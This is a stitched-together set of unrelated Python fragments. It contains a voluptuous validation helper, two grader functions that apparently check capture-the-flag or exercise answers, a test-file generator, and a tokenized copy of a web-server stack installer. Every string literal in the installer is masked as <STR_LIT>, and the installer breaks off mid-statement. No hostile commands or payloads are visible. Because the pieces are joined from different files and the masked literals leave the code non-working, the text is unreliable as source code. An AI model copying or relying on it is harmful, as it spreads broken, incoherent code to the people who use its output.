from voluptuous import Required, Length, Schema, Invalid, MultipleInvalid
from api.exceptions import *


def check(*callback_tuples):
    """Build a validator function from (callbacks, message) pairs.

    Each positional argument is a tuple ``(callbacks, msg)`` where
    ``callbacks`` is an iterable of callables applied to the value being
    validated.  A callback signals failure either by raising any exception
    or by returning a strict boolean ``False`` (other falsy results such as
    0, "" or None are deliberately accepted).

    Returns:
        A validator that returns the value unchanged on success and raises
        ``WebException(msg)`` for the first failing rule.
    """
    def v(value):
        for callbacks, msg in callback_tuples:
            for callback in callbacks:
                try:
                    result = callback(value)
                except Exception:
                    # Any error inside a callback is reported uniformly
                    # as this rule's message (original behavior kept).
                    raise WebException(msg)
                # Only a literal boolean False counts as failure; was
                # `type(result) == bool` plus an internal raise/catch of
                # Invalid that was immediately converted to WebException.
                if isinstance(result, bool) and not result:
                    raise WebException(msg)
        return value
    return v


def verify_to_schema(schema, data):
    """Validate *data* against a voluptuous *schema*.

    Raises:
        APIException: wrapping the voluptuous ``MultipleInvalid`` error so
            callers see a uniform API-level exception type.
    """
    try:
        schema(data)
    except MultipleInvalid as error:
        raise APIException(error)
def grade(tid, answer):
    """Grade a submitted answer string for this task.

    Args:
        tid: task identifier (not used by this checker).
        answer: the raw submitted answer.

    Returns:
        dict with a correctness flag and a feedback message.
    """
    # First marker substring present: submission is rejected with its
    # specific feedback message.
    if "<STR_LIT>" in answer:
        return {"<STR_LIT>": False, "<STR_LIT:message>": "<STR_LIT>"}
    # Second marker substring present: submission is accepted.
    if "<STR_LIT>" in answer:
        return {"<STR_LIT>": True, "<STR_LIT:message>": "<STR_LIT>"}
    # Neither marker recognized: generic failure response.
    return {"<STR_LIT>": False, "<STR_LIT:message>": "<STR_LIT>"}
def grade(tid, answer):
    """Grade a submitted answer string for this task.

    Args:
        tid: task identifier (not used by this checker).
        answer: the raw submitted answer.

    Returns:
        dict with a correctness flag and a feedback message.
    """
    # Accept the submission as soon as the marker substring is found.
    if "<STR_LIT>" in answer:
        return {"<STR_LIT>": True, "<STR_LIT:message>": "<STR_LIT>"}
    # Marker absent: generic failure response.
    return {"<STR_LIT>": False, "<STR_LIT:message>": "<STR_LIT>"}
import math
import os
import random
import imp

# NOTE(review): `imp` is deprecated and removed in Python 3.12; migrating to
# importlib.machinery.SourceFileLoader needs confirming the target interpreter.
common = imp.load_source("<STR_LIT>", "<STR_LIT>")


def insert(original, new, pos):
    """Return *original* with ``str(new)`` spliced in at index *pos*."""
    return original[:pos] + str(new) + original[pos:]


def generate(full_path):
    """Generate paired test files under *full_path*.

    For each of 10 randomly chosen strings, writes the pristine string to
    one file and a copy mutated by 20 random single-digit insertions to a
    companion file.

    Returns:
        1 on success, 0 on any failure (best-effort contract preserved
        from the original implementation).
    """
    try:
        # random.sample() no longer accepts a set (Python 3.11+); build a
        # list from the deduplicated strings first.
        chosen = random.sample(list(set(common.strings)), 10)
        # Real copy: the original aliased `changed = chosen`, which worked
        # only because each pristine string was written before mutation.
        changed = list(chosen)
        for i in range(10):
            output = chosen[i] + "<STR_LIT:\n>"
            # `with` guarantees the handle is closed even on error
            # (the originals were opened and closed manually).
            with open(full_path + os.sep + "<STR_LIT:test>" + str(i) + "<STR_LIT>",
                      "<STR_LIT:w>") as f:
                f.write("<STR_LIT:%s>" % output)
            # Inject 20 random digits at random positions.
            for _ in range(20):
                changed[i] = insert(changed[i],
                                    random.randint(0, 9),
                                    random.randint(0, len(changed[i]) - 1))
            name = changed[i]
            with open(full_path + os.sep + "<STR_LIT:test>" + str(i) + "<STR_LIT>",
                      "<STR_LIT:w>") as f:
                f.write("<STR_LIT>" % name)
        return 1
    except Exception:
        # Was a bare `except:`; narrowed so KeyboardInterrupt/SystemExit
        # propagate while keeping the 0-on-failure contract.
        return 0
<s> """<STR_LIT>""" <EOL> from cement . core . controller import CementBaseController , expose <EOL> from cement . core import handler , hook <EOL> from ee . cli . plugins . site_functions import * <EOL> from ee . core . variables import EEVariables <EOL> from ee . core . aptget import EEAptGet <EOL> from ee . core . download import EEDownload <EOL> from ee . core . shellexec import EEShellExec , CommandExecutionError <EOL> from ee . core . fileutils import EEFileUtils <EOL> from ee . core . apt_repo import EERepo <EOL> from ee . core . extract import EEExtract <EOL> from ee . core . mysql import EEMysql <EOL> from ee . core . addswap import EESwap <EOL> from ee . core . git import EEGit <EOL> from ee . core . checkfqdn import check_fqdn <EOL> from pynginxconfig import NginxConfig <EOL> from ee . core . services import EEService <EOL> from ee . core . variables import EEVariables <EOL> import random <EOL> import string <EOL> import configparser <EOL> import time <EOL> import shutil <EOL> import os <EOL> import pwd <EOL> import grp <EOL> import codecs <EOL> import platform <EOL> from ee . cli . plugins . stack_services import EEStackStatusController <EOL> from ee . cli . plugins . stack_migrate import EEStackMigrateController <EOL> from ee . cli . plugins . stack_upgrade import EEStackUpgradeController <EOL> from ee . core . logging import Log <EOL> from ee . cli . plugins . 
sitedb import * <EOL> def ee_stack_hook ( app ) : <EOL> pass <EOL> class EEStackController ( CementBaseController ) : <EOL> class Meta : <EOL> label = '<STR_LIT>' <EOL> stacked_on = '<STR_LIT>' <EOL> stacked_type = '<STR_LIT>' <EOL> description = '<STR_LIT>' <EOL> arguments = [ <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = 
'<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ( [ '<STR_LIT>' ] , <EOL> dict ( help = '<STR_LIT>' , action = '<STR_LIT:store_true>' ) ) , <EOL> ] <EOL> usage = "<STR_LIT>" <EOL> @ expose ( hide = True ) <EOL> def default ( self ) : <EOL> """<STR_LIT>""" <EOL> self . app . args . print_help ( ) <EOL> @ expose ( hide = True ) <EOL> def pre_pref ( self , apt_packages ) : <EOL> """<STR_LIT>""" <EOL> if set ( EEVariables . ee_postfix ) . issubset ( set ( apt_packages ) ) : <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> if set ( EEVariables . ee_mysql ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> mysql_pref = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> with open ( '<STR_LIT>' <EOL> '<STR_LIT>' , '<STR_LIT:w>' ) as mysql_pref_file : <EOL> mysql_pref_file . write ( mysql_pref ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_mysql_repo ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> . format ( EEVariables . ee_mysql_repo ) ) <EOL> EERepo . add_key ( self , '<STR_LIT>' , <EOL> keyserver = "<STR_LIT>" ) <EOL> chars = '<STR_LIT>' . join ( random . sample ( string . ascii_letters , <NUM_LIT:8> ) ) <EOL> Log . debug ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( chars = chars ) , <EOL> log = False ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( "<STR_LIT>" ) <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> try : <EOL> EEShellExec . 
cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( chars = chars ) , <EOL> log = False ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( "<STR_LIT>" ) <EOL> mysql_config = """<STR_LIT>""" . format ( chars = chars ) <EOL> config = configparser . ConfigParser ( ) <EOL> config . read_string ( mysql_config ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> conf_path = "<STR_LIT>" <EOL> os . makedirs ( os . path . dirname ( conf_path ) , exist_ok = True ) <EOL> with open ( conf_path , encoding = '<STR_LIT:utf-8>' , <EOL> mode = '<STR_LIT:w>' ) as configfile : <EOL> config . write ( configfile ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EEFileUtils . chmod ( self , "<STR_LIT>" , <NUM_LIT> ) <EOL> if set ( EEVariables . ee_nginx ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_nginx_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , EEVariables . ee_nginx_key ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_nginx_dev_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , EEVariables . ee_nginx_key ) <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' : <EOL> if set ( EEVariables . ee_php ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_distro == '<STR_LIT>' : <EOL> if EEVariables . ee_platform_codename != '<STR_LIT>' : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_php_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , '<STR_LIT>' ) <EOL> else : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_php_repo ) <EOL> else : <EOL> if set ( EEVariables . ee_php7_0 ) . 
issubset ( set ( apt_packages ) ) or set ( EEVariables . ee_php5_6 ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_php_repo ) <EOL> if set ( EEVariables . ee_hhvm ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_boost_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_hhvm_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_mail ) . issubset ( set ( apt_packages ) ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( "<STR_LIT>" ) <EOL> if set ( EEVariables . ee_redis ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , "<STR_LIT>" ) <EOL> if EEVariables . ee_platform_distro == '<STR_LIT>' : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , repo_url = EEVariables . ee_redis_repo ) <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add_key ( self , '<STR_LIT>' ) <EOL> else : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EERepo . add ( self , ppa = EEVariables . ee_redis_repo ) <EOL> @ expose ( hide = True ) <EOL> def post_pref ( self , apt_packages , packages ) : <EOL> """<STR_LIT>""" <EOL> if len ( apt_packages ) : <EOL> if set ( EEVariables . ee_postfix ) . issubset ( set ( apt_packages ) ) : <EOL> EEGit . add ( self , [ "<STR_LIT>" ] , <EOL> msg = "<STR_LIT>" ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( EEVariables . ee_nginx ) . 
issubset ( set ( apt_packages ) ) or set ( EEVariables . ee_nginx_dev ) . issubset ( set ( apt_packages ) ) : <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> if not EEFileUtils . grep ( self , '<STR_LIT>' , <EOL> '<STR_LIT>' ) : <EOL> with open ( '<STR_LIT>' , encoding = '<STR_LIT:utf-8>' , <EOL> mode = '<STR_LIT:a>' ) as ee_nginx : <EOL> ee_nginx . write ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> http2 = "<STR_LIT>" if EEAptGet . is_installed ( self , '<STR_LIT>' ) else "<STR_LIT>" <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 = http2 ) ) : <EOL> Log . debug ( self , '<STR_LIT>' ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 ) ) <EOL> sites = getAllsites ( self ) <EOL> if sites : <EOL> for site in sites : <EOL> site_name = site . sitename <EOL> siteinfo = getSiteInfo ( self , site_name ) <EOL> ssl = ( "<STR_LIT>" if siteinfo . is_ssl else "<STR_LIT>" ) <EOL> if ( ssl == "<STR_LIT>" ) : <EOL> if os . path . isfile ( '<STR_LIT>' . format ( site_name ) ) : <EOL> http2 = ( "<STR_LIT>" if EEAptGet . is_installed ( self , '<STR_LIT>' ) else "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 = http2 , site = site_name ) ) : <EOL> Log . debug ( self , '<STR_LIT>' . format ( site_name ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" . format ( http2 = http2 , site = site_name ) ) <EOL> if not ( os . path . isfile ( '<STR_LIT>' ) ) : <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" ) <EOL> EEFileUtils . searchreplace ( self , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_version ) ) <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . 
render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> data = dict ( php = "<STR_LIT>" , debug = "<STR_LIT>" , hhvm = "<STR_LIT>" , php7 = "<STR_LIT>" , debug7 = "<STR_LIT>" , <EOL> hhvmconf = False , php7conf = True if EEAptGet . is_installed ( self , '<STR_LIT>' ) else False ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> http2 = ( "<STR_LIT>" if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) else "<STR_LIT>" ) <EOL> data = dict ( webroot = EEVariables . ee_webroot , http2 = http2 ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . 
debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if EEVariables . ee_platform_codename == '<STR_LIT>' and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . 
debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> Log . info ( self , <EOL> "<STR_LIT>" "<STR_LIT>" ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . 
close ( ) <EOL> passwd = '<STR_LIT>' . join ( [ random . choice <EOL> ( string . ascii_letters + string . digits ) <EOL> for n in range ( <NUM_LIT:6> ) ] ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( password = passwd ) ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> if not os . path . exists ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) : <EOL> Log . debug ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> os . makedirs ( '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> ) <EOL> EEFileUtils . create_symlink ( self , [ '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> . format ( EEVariables . ee_webroot ) ] <EOL> ) <EOL> try : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEFileUtils . mvfile ( self , "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . 
cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> . format ( EEVariables . ee_webroot ) ) <EOL> except CommandExecutionError as e : <EOL> Log . error ( self , "<STR_LIT>" ) <EOL> EEGit . add ( self , <EOL> [ "<STR_LIT>" ] , msg = "<STR_LIT>" ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> if set ( [ "<STR_LIT>" ] ) . issubset ( set ( apt_packages ) ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) : <EOL> EEShellExec . cmd_exec ( self , "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> data [ '<STR_LIT:version>' ] = EEVariables . ee_version <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> print ( "<STR_LIT>" <EOL> + "<STR_LIT>" . format ( passwd ) ) <EOL> EEService . reload_service ( self , '<STR_LIT>' ) <EOL> else : <EOL> self . msg = ( self . msg + [ "<STR_LIT>" ] <EOL> + [ "<STR_LIT>" . format ( passwd ) ] ) <EOL> else : <EOL> EEService . restart_service ( self , '<STR_LIT>' ) <EOL> if EEAptGet . is_installed ( self , '<STR_LIT>' ) : <EOL> if os . path . isfile ( "<STR_LIT>" ) and ( not <EOL> os . path . isfile ( "<STR_LIT>" ) ) : <EOL> data = dict ( ) <EOL> Log . debug ( self , '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ee_nginx = open ( '<STR_LIT>' , <EOL> encoding = '<STR_LIT:utf-8>' , mode = '<STR_LIT:w>' ) <EOL> self . app . render ( ( data ) , '<STR_LIT>' , <EOL> out = ee_nginx ) <EOL> ee_nginx . close ( ) <EOL> if os . path . 
